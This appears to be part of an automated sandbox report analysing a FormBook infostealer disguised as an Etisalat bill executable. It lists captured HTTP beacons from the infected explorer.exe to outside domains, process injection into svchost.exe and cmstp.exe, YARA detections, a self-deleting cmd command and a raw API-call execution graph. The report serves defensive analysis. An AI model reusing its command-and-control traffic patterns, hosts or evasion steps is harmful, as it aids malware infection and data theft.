                                    keep-alive: timeout=5
                                    transfer-encoding: chunked
                                    connection: close
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.54971213.248.169.48801028C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    May 28, 2024 15:09:27.255122900 CEST171OUTGET /da29/?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert HTTP/1.1
                                    Host: www.aerotyneholdings.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    May 28, 2024 15:09:27.774974108 CEST344INHTTP/1.1 200 OK
                                    Server: openresty
                                    Date: Tue, 28 May 2024 13:09:27 GMT
                                    Content-Type: text/html
                                    Content-Length: 204
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 6c 3d 7a 4d 6b 62 58 6c 41 6a 42 41 68 55 7a 58 32 49 48 79 31 31 62 50 70 62 69 2b 4a 6f 49 53 61 33 66 33 56 4b 30 39 64 77 68 49 61 76 77 4e 4a 62 59 78 38 38 41 54 55 32 70 4d 42 73 32 34 71 38 6f 51 7a 41 26 32 64 71 68 6c 3d 52 32 4d 6c 56 78 50 38 65 72 74 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert"}</script></head></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.549713190.115.24.78801028C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    May 28, 2024 15:09:47.777688026 CEST160OUTGET /da29/?2dqhl=R2MlVxP8ert&6l=R0vht/u//GQkKJnhnDzhccCvBPqy5ItmLDFelNY6QmkspbEKZfPP+/bGeDfLPfj4cOFx HTTP/1.1
                                    Host: www.1wxir.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.549714169.239.128.46801028C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    May 28, 2024 15:10:29.038584948 CEST161OUTGET /da29/?2dqhl=R2MlVxP8ert&6l=IK1SFyt5vgXTEdWXyzXhj/+ddmg0nYKJwLobMWZqnGcsuxwYcVM7IV3LfBY9TbKtfD67 HTTP/1.1
                                    Host: www.myconc.pro
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:07:46
                                    Start date:28/05/2024
                                    Path:C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
                                    Imagebase:0xb60000
                                    File size:1'062'400 bytes
                                    MD5 hash:AA15C6BC55041B534268E0A07C5F0ABC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:09:07:47
                                    Start date:28/05/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe"
                                    Imagebase:0x940000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:09:07:48
                                    Start date:28/05/2024
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff674740000
                                    File size:5'141'208 bytes
                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000003.00000002.4443389899.0000000010977000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:09:07:51
                                    Start date:28/05/2024
                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\cmstp.exe"
                                    Imagebase:0xad0000
                                    File size:81'920 bytes
                                    MD5 hash:D7AABFAB5BEFD53BA3A27BD48F3CC675
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate
                                    Has exited:false

                                    General

                                    Target ID:5
                                    Start time:09:07:54
                                    Start date:28/05/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                    Imagebase:0x790000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:09:07:54
                                    Start date:28/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:4%
                                      Dynamic/Decrypted Code Coverage:0.4%
                                      Signature Coverage:5.6%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:165
                                      execution_graph 98951 b61016 98956 b64ad2 98951->98956 98966 b80ff6 98956->98966 98958 b64ada 98959 b6101b 98958->98959 98976 b64a94 98958->98976 98963 b82f80 98959->98963 99066 b82e84 98963->99066 98965 b61025 98969 b80ffe 98966->98969 98968 b81018 98968->98958 98969->98968 98971 b8101c std::exception::exception 98969->98971 99004 b8594c 98969->99004 99021 b835e1 DecodePointer 98969->99021 99022 b887db RaiseException 98971->99022 98973 b81046 99023 b88711 58 API calls _free 98973->99023 98975 b81058 98975->98958 98977 b64aaf 98976->98977 98978 b64a9d 98976->98978 98980 b64afe 98977->98980 98979 b82f80 __cinit 67 API calls 98978->98979 98979->98977 99032 b677c7 98980->99032 98984 b64b59 98994 b64b86 98984->98994 99050 b67e8c 98984->99050 98986 b64b7a 99054 b67886 98986->99054 98988 b64bf1 GetCurrentProcess IsWow64Process 98989 b64c0a 98988->98989 98991 b64c20 98989->98991 98992 b64c89 GetSystemInfo 98989->98992 98990 b9dc8d 99046 b64c95 98991->99046 98993 b64c56 98992->98993 98993->98959 98994->98988 98994->98990 98997 b64c32 99000 b64c95 2 API calls 98997->99000 98998 b64c7d GetSystemInfo 98999 b64c47 98998->98999 98999->98993 99001 b64c4d FreeLibrary 98999->99001 99002 b64c3a GetNativeSystemInfo 99000->99002 99001->98993 99002->98999 99005 b859c7 99004->99005 99018 b85958 99004->99018 99030 b835e1 DecodePointer 99005->99030 99007 b85963 99007->99018 99024 b8a3ab 58 API calls 2 library calls 99007->99024 99025 b8a408 58 API calls 8 library calls 99007->99025 99026 b832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99007->99026 99008 b859cd 99031 b88d68 58 API calls __getptd_noexit 99008->99031 99011 b8598b RtlAllocateHeap 99013 b859bf 99011->99013 99011->99018 99013->98969 99014 b859b3 99028 b88d68 58 API calls __getptd_noexit 99014->99028 99018->99007 99018->99011 99018->99014 99019 b859b1 99018->99019 99027 b835e1 DecodePointer 99018->99027 99029 b88d68 58 API calls __getptd_noexit 99019->99029 99021->98969 99022->98973 99023->98975 99024->99007 99025->99007 99027->99018 99028->99019 99029->99013 99030->99008 99031->99013 99033 b80ff6 Mailbox 59 API calls 99032->99033 99034 b677e8 99033->99034 99035 b80ff6 Mailbox 59 API calls 99034->99035 99036 b64b16 GetVersionExW 99035->99036 99037 b67d2c 99036->99037 99038 b67da5 99037->99038 99039 b67d38 __wsetenvp 99037->99039 99040 b67e8c 59 API calls 99038->99040 99041 b67d73 99039->99041 99042 b67d4e 99039->99042 99045 b67d56 _memmove 99040->99045 99059 b68189 99041->99059 99058 b68087 59 API calls Mailbox 99042->99058 99045->98984 99047 b64c2e 99046->99047 99048 b64c9e LoadLibraryA 99046->99048 99047->98997 99047->98998 99048->99047 99049 b64caf GetProcAddress 99048->99049 99049->99047 99051 b67e9a 99050->99051 99053 b67ea3 _memmove 99050->99053 99051->99053 99062 b67faf 99051->99062 99053->98986 99055 b67894 99054->99055 99056 b67e8c 59 API calls 99055->99056 99057 b678a4 99056->99057 99057->98994 99058->99045 99060 b80ff6 Mailbox 59 API calls 99059->99060 99061 b68193 99060->99061 99061->99045 99063 b67fc2 99062->99063 99065 b67fbf _memmove 99062->99065 99064 b80ff6 Mailbox 59 API calls 99063->99064 99064->99065 99065->99053 99067 b82e90 _flsall 99066->99067 99074 b83457 99067->99074 99073 b82eb7 _flsall 99073->98965 99091 b89e4b 99074->99091 99076 b82e99 99077 b82ec8 DecodePointer DecodePointer 99076->99077 99078 b82ef5 99077->99078 99079 b82ea5 99077->99079 99078->99079 99137 b889e4 59 API calls __filbuf 99078->99137 99088 b82ec2 99079->99088 99081 b82f58 EncodePointer EncodePointer 99081->99079 99082 b82f2c 99082->99079 99086 b82f46 EncodePointer 99082->99086 99139 b88aa4 61 API calls 2 library calls 99082->99139 99083 b82f07 99083->99081 99083->99082 99138 b88aa4 61 API calls 2 library calls 99083->99138 99086->99081 99087 b82f40 99087->99079 99087->99086 99140 b83460 99088->99140 99092 b89e5c 99091->99092 99093 b89e6f EnterCriticalSection 99091->99093 99098 b89ed3 99092->99098 99093->99076 99095 b89e62 99095->99093 99122 b832f5 58 API calls 3 library calls 99095->99122 99099 b89edf _flsall 99098->99099 99100 b89ee8 99099->99100 99101 b89f00 99099->99101 99123 b8a3ab 58 API calls 2 library calls 99100->99123 99110 b89f21 _flsall 99101->99110 99126 b88a5d 58 API calls 2 library calls 99101->99126 99103 b89eed 99124 b8a408 58 API calls 8 library calls 99103->99124 99106 b89f15 99108 b89f2b 99106->99108 99109 b89f1c 99106->99109 99107 b89ef4 99125 b832df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 99107->99125 99111 b89e4b __lock 58 API calls 99108->99111 99127 b88d68 58 API calls __getptd_noexit 99109->99127 99110->99095 99114 b89f32 99111->99114 99116 b89f3f 99114->99116 99117 b89f57 99114->99117 99128 b8a06b InitializeCriticalSectionAndSpinCount 99116->99128 99129 b82f95 99117->99129 99120 b89f4b 99135 b89f73 LeaveCriticalSection _doexit 99120->99135 99123->99103 99124->99107 99126->99106 99127->99110 99128->99120 99130 b82f9e RtlFreeHeap 99129->99130 99134 b82fc7 _free 99129->99134 99131 b82fb3 99130->99131 99130->99134 99136 b88d68 58 API calls __getptd_noexit 99131->99136 99133 b82fb9 GetLastError 99133->99134 99134->99120 99135->99110 99136->99133 99137->99083 99138->99082 99139->99087 99143 b89fb5 LeaveCriticalSection 99140->99143 99142 b82ec7 99142->99073 99143->99142 99144 b61066 99149 b6f8cf 99144->99149 99146 b6106c 99147 b82f80 __cinit 67 API calls 99146->99147 99148 b61076 99147->99148 99150 b6f8f0 99149->99150 99182 b80143 99150->99182 99154 b6f937 99155 b677c7 59 API calls 99154->99155 99156 b6f941 99155->99156 99157 b677c7 59 API calls 99156->99157 99158 b6f94b 99157->99158 99159 b677c7 59 API calls 99158->99159 99160 b6f955 99159->99160 99161 b677c7 59 API calls 99160->99161 99162 b6f993 99161->99162 99163 b677c7 59 API calls 99162->99163 99164 b6fa5e 99163->99164 99192 b760e7 99164->99192 99168 b6fa90 99169 b677c7 59 API calls 99168->99169 99170 b6fa9a 99169->99170 99220 b7ffde 99170->99220 99172 b6fae1 99173 b6faf1 GetStdHandle 99172->99173 99174 b6fb3d 99173->99174 99175 ba49d5 99173->99175 99176 b6fb45 OleInitialize 99174->99176 99175->99174 99177 ba49de 99175->99177 99176->99146 99227 bc6dda 64 API calls Mailbox 99177->99227 99179 ba49e5 99228 bc74a9 CreateThread 99179->99228 99181 ba49f1 CloseHandle 99181->99176 99229 b8021c 99182->99229 99185 b8021c 59 API calls 99186 b80185 99185->99186 99187 b677c7 59 API calls 99186->99187 99188 b80191 99187->99188 99189 b67d2c 59 API calls 99188->99189 99190 b6f8f6 99189->99190 99191 b803a2 6 API calls 99190->99191 99191->99154 99193 b677c7 59 API calls 99192->99193 99194 b760f7 99193->99194 99195 b677c7 59 API calls 99194->99195 99196 b760ff 99195->99196 99236 b75bfd 99196->99236 99199 b75bfd 59 API calls 99200 b7610f 99199->99200 99201 b677c7 59 API calls 99200->99201 99202 b7611a 99201->99202 99203 b80ff6 Mailbox 59 API calls 99202->99203 99204 b6fa68 99203->99204 99205 b76259 99204->99205 99206 b76267 99205->99206 99207 b677c7 59 API calls 99206->99207 99208 b76272 99207->99208 99209 b677c7 59 API calls 99208->99209 99210 b7627d 99209->99210 99211 b677c7 59 API calls 99210->99211 99212 b76288 99211->99212 99213 b677c7 59 API calls 99212->99213 99214 b76293 99213->99214 99215 b75bfd 59 API calls 99214->99215 99216 b7629e 99215->99216 99217 b80ff6 Mailbox 59 API calls 99216->99217 99218 b762a5 RegisterWindowMessageW 99217->99218 99218->99168 99221 bb5cc3 99220->99221 99222 b7ffee 99220->99222 99239 bc9d71 60 API calls 99221->99239 99224 b80ff6 Mailbox 59 API calls 99222->99224 99226 b7fff6 99224->99226 99225 bb5cce 99226->99172 99227->99179 99228->99181 99240 bc748f 65 API calls 99228->99240 99230 b677c7 59 API calls 99229->99230 99231 b80227 99230->99231 99232 b677c7 59 API calls 99231->99232 99233 b8022f 99232->99233 99234 b677c7 59 API calls 99233->99234 99235 b8017b 99234->99235 99235->99185 99237 b677c7 59 API calls 99236->99237 99238 b75c05 99237->99238 99238->99199 99239->99225 99241 b61055 99246 b62649 99241->99246 99244 b82f80 __cinit 67 API calls 99245 b61064 99244->99245 99247 b677c7 59 API calls 99246->99247 99248 b626b7 99247->99248 99253 b63582 99248->99253 99250 b62754 99251 b6105a 99250->99251 99256 b63416 59 API calls 2 library calls 99250->99256 99251->99244 99257 b635b0 99253->99257 99256->99250 99258 b635a1 99257->99258 99259 b635bd 99257->99259 99258->99250 99259->99258 99260 b635c4 RegOpenKeyExW 99259->99260 99260->99258 99261 b635de RegQueryValueExW 99260->99261 99262 b63614 RegCloseKey 99261->99262 99263 b635ff 99261->99263 99262->99258 99263->99262 99264 b63633 99265 b6366a 99264->99265 99266 b636e7 99265->99266 99267 b63688 99265->99267 99304 b636e5 99265->99304 99269 b9d31c 99266->99269 99270 b636ed 99266->99270 99271 b63695 99267->99271 99272 b6375d PostQuitMessage 99267->99272 99268 b636ca DefWindowProcW 99306 b636d8 99268->99306 99314 b711d0 10 API calls Mailbox 99269->99314 99273 b63715 SetTimer RegisterWindowMessageW 99270->99273 99274 b636f2 99270->99274 99275 b9d38f 99271->99275 99276 b636a0 99271->99276 99272->99306 99280 b6373e CreatePopupMenu 99273->99280 99273->99306 99278 b9d2bf 99274->99278 99279 b636f9 KillTimer 99274->99279 99329 bc2a16 71 API calls _memset 99275->99329 99281 b63767 99276->99281 99282 b636a8 99276->99282 99287 b9d2f8 MoveWindow 99278->99287 99288 b9d2c4 99278->99288 99309 b644cb Shell_NotifyIconW _memset 99279->99309 99280->99306 99312 b64531 64 API calls _memset 99281->99312 99290 b636b3 99282->99290 99291 b9d374 99282->99291 99284 b9d343 99315 b711f3 341 API calls Mailbox 99284->99315 99287->99306 99293 b9d2c8 99288->99293 99294 b9d2e7 SetFocus 99288->99294 99296 b636be 99290->99296 99297 b6374b 99290->99297 99291->99268 99328 bb817e 59 API calls Mailbox 99291->99328 99292 b9d3a1 99292->99268 99292->99306 99293->99296 99298 b9d2d1 99293->99298 99294->99306 99295 b6370c 99310 b63114 DeleteObject DestroyWindow Mailbox 99295->99310 99296->99268 99316 b644cb Shell_NotifyIconW _memset 99296->99316 99311 b645df 81 API calls _memset 99297->99311 99313 b711d0 10 API calls Mailbox 99298->99313 99302 b6375b 99302->99306 99304->99268 99307 b9d368 99317 b643db 99307->99317 99309->99295 99310->99306 99311->99302 99312->99302 99313->99306 99314->99284 99315->99296 99316->99307 99318 b64406 _memset 99317->99318 99330 b64213 99318->99330 99321 b6448b 99323 b644a5 Shell_NotifyIconW 99321->99323 99324 b644c1 Shell_NotifyIconW 99321->99324 99325 b644b3 99323->99325 99324->99325 99334 b6410d 99325->99334 99327 b644ba 99327->99304 99328->99304 99329->99292 99331 b9d638 99330->99331 99332 b64227 99330->99332 99331->99332 99333 b9d641 DestroyIcon 99331->99333 99332->99321 99356 bc3226 62 API calls _W_store_winword 99332->99356 99333->99332 99335 b64129 99334->99335 99355 b64200 Mailbox 99334->99355 99357 b67b76 99335->99357 99338 b64144 99340 b67d2c 59 API calls 99338->99340 99339 b9d5dd LoadStringW 99342 b9d5f7 99339->99342 99341 b64159 99340->99341 99341->99342 99343 b6416a 99341->99343 99344 b67c8e 59 API calls 99342->99344 99345 b64174 99343->99345 99346 b64205 99343->99346 99349 b9d601 99344->99349 99362 b67c8e 99345->99362 99371 b681a7 99346->99371 99352 b6417e _memset _wcscpy 99349->99352 99375 b67e0b 99349->99375 99351 b9d623 99354 b67e0b 59 API calls 99351->99354 99353 b641e6 Shell_NotifyIconW 99352->99353 99353->99355 99354->99352 99355->99327 99356->99321 99358 b80ff6 Mailbox 59 API calls 99357->99358 99359 b67b9b 99358->99359 99360 b68189 59 API calls 99359->99360 99361 b64137 99360->99361 99361->99338 99361->99339 99363 b67ca0 99362->99363 99364 b9f094 99362->99364 99382 b67bb1 99363->99382 99388 bb8123 59 API calls _memmove 99364->99388 99367 b67cac 99367->99352 99368 b9f09e 99369 b681a7 59 API calls 99368->99369 99370 b9f0a6 Mailbox 99369->99370 99372 b681b2 99371->99372 99373 b681ba 99371->99373 99389 b680d7 59 API calls 2 library calls 99372->99389 99373->99352 99376 b67e1f 99375->99376 99377 b9f173 99375->99377 99390 b67db0 99376->99390 99379 b68189 59 API calls 99377->99379 99381 b9f17e __wsetenvp _memmove 99379->99381 99380 b67e2a 99380->99351 99383 b67be5 _memmove 99382->99383 99384 b67bbf 99382->99384 99383->99367 99383->99383 99384->99383 99385 b80ff6 Mailbox 59 API calls 99384->99385 99386 b67c34 99385->99386 99387 b80ff6 Mailbox 59 API calls 99386->99387 99387->99383 99388->99368 99389->99373 99391 b67dbf __wsetenvp 99390->99391 99392 b68189 59 API calls 99391->99392 99393 b67dd0 _memmove 99391->99393 99394 b9f130 _memmove 99392->99394 99393->99380 99395 b6b56e 99402 b7fb84 99395->99402 99397 b6b584 99411 b6c707 99397->99411 99399 b6b5ac 99400 b6a4e8 99399->99400 99423 bca0b5 89 API calls 4 library calls 99399->99423 99403 b7fba2 99402->99403 99404 b7fb90 99402->99404 99405 b7fbd1 99403->99405 99406 b7fba8 99403->99406 99424 b69e9c 60 API calls Mailbox 99404->99424 99425 b69e9c 60 API calls Mailbox 99405->99425 99408 b80ff6 Mailbox 59 API calls 99406->99408 99410 b7fb9a 99408->99410 99410->99397 99412 b67b76 59 API calls 99411->99412 99413 b6c72c _wcscmp 99411->99413 99412->99413 99416 b6c760 Mailbox 99413->99416 99426 b67f41 99413->99426 99416->99399 99417 b67c8e 59 API calls 99418 ba1ac6 99417->99418 99430 b6859a 68 API calls 99418->99430 99420 ba1ad7 99422 ba1adb Mailbox 99420->99422 99431 b69e9c 60 API calls Mailbox 99420->99431 99422->99399 99423->99400 99424->99410 99425->99410 99427 b67f50 __wsetenvp _memmove 99426->99427 99428 b80ff6 Mailbox 59 API calls 99427->99428 99429 b67f8e 99428->99429 99429->99417 99430->99420 99431->99422 99432 b87e93 99433 b87e9f _flsall 99432->99433 99469 b8a048 GetStartupInfoW 99433->99469 99435 b87ea4 99471 b88dbc GetProcessHeap 99435->99471 99437 b87efc 99438 b87f07 99437->99438 99554 b87fe3 58 API calls 3 library calls 99437->99554 99472 b89d26 99438->99472 99441 b87f0d 99442 b87f18 __RTC_Initialize 99441->99442 99555 b87fe3 58 API calls 3 library calls 99441->99555 99493 b8d812 99442->99493 99445 b87f27 99446 b87f33 GetCommandLineW 99445->99446 99556 b87fe3 58 API calls 3 library calls 99445->99556 99512 b95173 GetEnvironmentStringsW 99446->99512 99449 b87f32 99449->99446 99452 b87f4d 99453 b87f58 99452->99453 99557 b832f5 58 API calls 3 library calls 99452->99557 99522 b94fa8 99453->99522 99456 b87f5e 99457 b87f69 99456->99457 99558 b832f5 58 API calls 3 library calls 99456->99558 99536 b8332f 99457->99536 99460 b87f71 99461 b87f7c __wwincmdln 99460->99461 99559 b832f5 58 API calls 3 library calls 99460->99559 99542 b6492e 99461->99542 99464 b87f90 99465 b87f9f 99464->99465 99560 b83598 58 API calls _doexit 99464->99560 99561 b83320 58 API calls _doexit 99465->99561 99468 b87fa4 _flsall 99470 b8a05e 99469->99470 99470->99435 99471->99437 99562 b833c7 36 API calls 2 library calls 99472->99562 99474 b89d2b 99563 b89f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 99474->99563 99476 b89d30 99477 b89d34 99476->99477 99565 b89fca TlsAlloc 99476->99565 99564 b89d9c 61 API calls 2 library calls 99477->99564 99480 b89d39 99480->99441 99481 b89d46 99481->99477 99482 b89d51 99481->99482 99566 b88a15 99482->99566 99485 b89d93 99574 b89d9c 61 API calls 2 library calls 99485->99574 99488 b89d98 99488->99441 99489 b89d72 99489->99485 99490 b89d78 99489->99490 99573 b89c73 58 API calls 4 library calls 99490->99573 99492 b89d80 GetCurrentThreadId 99492->99441 99494 b8d81e _flsall 99493->99494 99495 b89e4b __lock 58 API calls 99494->99495 99496 b8d825 99495->99496 99497 b88a15 __calloc_crt 58 API calls 99496->99497 